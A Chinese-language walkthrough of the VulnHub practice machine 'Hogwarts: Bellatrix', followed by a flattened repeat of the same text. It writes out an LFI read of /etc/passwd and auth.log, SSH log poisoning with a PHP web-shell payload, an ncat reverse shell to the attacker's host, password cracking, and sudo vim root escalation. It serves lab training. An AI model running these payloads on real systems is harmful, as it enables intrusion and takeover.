HOGWARTS: BELLATRIX 靶机渗透
字数 1049 2025-08-15 21:33:59

HOGWARTS: BELLATRIX 靶机渗透实战教程

靶机基础信息

环境准备

  1. 使用VMware Workstation Pro搭建靶机环境
  2. 将Kali Linux和靶机都设置为桥接模式
  3. 确保两者在同一网络段

渗透测试流程

一、信息收集阶段

1. 发现靶机IP

nmap 192.168.1.0/24
  • 发现靶机IP: 192.168.1.105

2. 端口和服务扫描

nmap -sV -p- -A -O 192.168.1.105
  • 扫描结果:
    • 22/tcp: OpenSSH 8.3p1 Ubuntu 1
    • 80/tcp: Apache httpd 2.4.46 (Ubuntu)

3. 网站信息收集

  • 查看网站源代码寻找线索

二、漏洞探测与利用

1. 文件包含漏洞(LFI)利用

发现存在文件包含漏洞的页面:

http://192.168.1.105/ikilledsiriusblack.php?file=/etc/passwd
  • 可以读取系统文件

2. 利用auth.log进行攻击

  • 访问日志文件:
http://192.168.1.105/ikilledsiriusblack.php?file=/var/log/auth.log
  • 利用SSH注入PHP代码:
ssh '<?php system($_GET['cmd']); ?>'@192.168.1.105
  • 这会向auth.log中注入恶意代码

3. 获取反向Shell

  • 通过注入的代码执行命令:
view-source:http://192.168.1.105/ikilledsiriusblack.php?file=/var/log/auth.log&cmd=ls -la
  • 使用ncat建立反向shell:
ncat 192.168.1.109 1234 -e /bin/bash
  • 升级为交互式shell:
python3 -c "import pty;pty.spawn('/bin/bash')"

三、权限提升

1. 信息收集

  • 查看当前目录:
ls -la
  • 发现隐藏目录包含密码文件

2. 密码破解

  • 将密码文件复制到Kali
  • 使用John the Ripper破解:
john --wordlist=/usr/share/wordlists/rockyou.txt hashfile
  • 获取凭据:
    • 用户名: lestrange
    • 密码: ihateharrypotter

3. 提权操作

  • 切换到lestrange用户:
su lestrange
  • 使用sudo vim提权:
sudo vim -c ':!/bin/sh'

技术要点总结

  1. 文件包含漏洞利用:

    • 通过参数注入读取系统文件
    • 重点利用/var/log/auth.log
  2. 日志污染技术:

    • 通过SSH失败登录注入PHP代码
    • 利用日志文件执行系统命令
  3. 权限提升路径:

    • 发现隐藏凭据文件
    • 使用john破解密码
    • 利用sudo vim的提权方法

参考资源

  1. LFI与SSH日志污染实现RCE
  2. GTFOBins提权方法
  3. 文件包含漏洞详解

学习建议

  1. 深入理解文件包含漏洞原理
  2. 掌握日志污染技术的应用场景
  3. 熟悉常见提权方法,特别是GTFOBins中的技术
  4. 练习信息收集技巧,特别是隐藏文件的发现
HOGWARTS: BELLATRIX 靶机渗透实战教程 靶机基础信息 下载链接 : https://www.vulnhub.com/entry/hogwarts-bellatrix,609/ 难度等级 : 简单/中等 发布日期 : 2020年11月28日 渗透目标 : 获取root权限 关键提示 : 除非必要,不需要使用暴力破解 ncat 是关键工具 环境准备 使用VMware Workstation Pro搭建靶机环境 将Kali Linux和靶机都设置为桥接模式 确保两者在同一网络段 渗透测试流程 一、信息收集阶段 1. 发现靶机IP 发现靶机IP: 192.168.1.105 2. 端口和服务扫描 扫描结果: 22/tcp: OpenSSH 8.3p1 Ubuntu 1 80/tcp: Apache httpd 2.4.46 (Ubuntu) 3. 网站信息收集 查看网站源代码寻找线索 二、漏洞探测与利用 1. 文件包含漏洞(LFI)利用 发现存在文件包含漏洞的页面: 可以读取系统文件 2. 利用auth.log进行攻击 访问日志文件: 利用SSH注入PHP代码: 这会向auth.log中注入恶意代码 3. 获取反向Shell 通过注入的代码执行命令: 使用ncat建立反向shell: 升级为交互式shell: 三、权限提升 1. 信息收集 查看当前目录: 发现隐藏目录包含密码文件 2. 密码破解 将密码文件复制到Kali 使用John the Ripper破解: 获取凭据: 用户名: lestrange 密码: ihateharrypotter 3. 提权操作 切换到lestrange用户: 使用sudo vim提权: 参考GTFOBins提权方法: https://gtfobins.github.io/gtfobins/vim/#sudo 技术要点总结 文件包含漏洞利用 : 通过参数注入读取系统文件 重点利用/var/log/auth.log 日志污染技术 : 通过SSH失败登录注入PHP代码 利用日志文件执行系统命令 权限提升路径 : 发现隐藏凭据文件 使用john破解密码 利用sudo vim的提权方法 参考资源 LFI与SSH日志污染实现RCE GTFOBins提权方法 文件包含漏洞详解 学习建议 深入理解文件包含漏洞原理 掌握日志污染技术的应用场景 熟悉常见提权方法,特别是GTFOBins中的技术 练习信息收集技巧,特别是隐藏文件的发现